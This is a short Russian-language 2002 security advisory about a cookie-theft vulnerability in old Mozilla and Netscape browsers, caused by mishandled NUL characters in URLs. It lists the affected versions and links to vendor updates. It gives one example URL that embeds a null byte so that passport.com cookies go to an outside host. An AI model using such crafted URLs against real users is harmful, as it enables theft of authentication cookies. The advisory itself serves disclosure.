Security Lab

Перехват куки в Mozilla и Netscape

Дата публикации:24.01.2002
Всего просмотров:3842
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Mozilla – популярный, бесплатный Web броузер для большинства Linux и Unix вариантов, MacOS и Microsoft Windows 9x/ME/NT/2000/XP.

Проблема, обнаруженная в Mozilla и Netscape, позволяет нападающему захватывать опознавательные данные на основе куки пользователя уязвимого web-браузера. Проблема находится в обработке NULL символа в URL. Уязвимость найдена в:
Mozilla Browser 0.9.2.1-0.9.6
Netscape Communicator 4.08-4.78
Netscape 6.1-6.2

Пример:

http://alive.znep.com%00www.passport.com/cgi-bin/cookies

Ссылки: Источник

http://www.mozilla.org/releases/
http://home.netscape.com/download/index.html